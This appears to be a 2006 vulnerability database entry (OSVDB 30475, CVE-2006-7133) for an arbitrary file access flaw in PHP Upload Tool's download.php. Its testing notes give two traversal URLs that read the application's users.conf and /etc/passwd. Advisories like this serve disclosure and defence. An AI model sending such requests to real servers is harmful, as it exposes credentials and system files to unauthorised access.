PHP Upload Tool bin/download.php filename Variable Arbitrary File Access

2006-11-17T09:04:32
ID OSVDB:30475
Type osvdb
Reporter OSVDB
Modified 2006-11-17T09:04:32

Description

Manual Testing Notes

http://[target]/upload/bin/download.php?filename=../conf/users.conf
http://[target]/upload/bin/download.php?filename=/etc/passwd

References:

Vendor URL: http://uploadtool.sourceforge.net/
Secunia Advisory ID: 22973
Related OSVDB ID: 30474
Other Advisory URL: http://www.craigheffner.com/security/exploits/upload_tool_php.txt
ISS X-Force ID: 30322
FrSIRT Advisory: ADV-2006-4575
CVE-2006-7133
Bugtraq ID: 21150